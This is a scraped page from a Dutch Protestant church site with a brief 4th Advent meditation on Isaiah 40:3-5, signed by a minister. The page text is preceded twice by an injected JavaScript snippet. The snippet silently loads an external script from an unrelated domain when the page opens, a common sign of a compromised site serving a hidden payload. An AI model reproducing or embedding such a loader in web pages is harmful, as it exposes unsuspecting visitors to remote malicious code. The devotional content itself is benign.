;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 4e Advent - PKN Damwâld

4e Advent

Gepubliceerd op: vrijdag 17 december 2021

Hoor, iemand roept: “Bereidt in de woestijn de weg des Heren, effent in de wildernis een baan voor onze God. Elk dal worde verhoogd en elke berg en heuvel geslecht, en het oneffene worde tot een vlakte en de rotsbodem tot een vallei. En de heerlijkheid des Heren zal zich openbaren, en al het levende tezamen zal dit zien, want de mond des Heren heeft het gesproken.” (Jesaja 40 vers 3 – 5)

In de voorbereiding op de komst van Jezus Christus worden we opgeroepen om ons voor te bereiden. In hoeverre zijn we er klaar voor dat Hij komt. Of staan er nog bergen tussen Hem en ons in of zijn er diepe dalen van moeite en twijfel? Een goede voorbereiding toegewenst!

Ds. G.J. Otter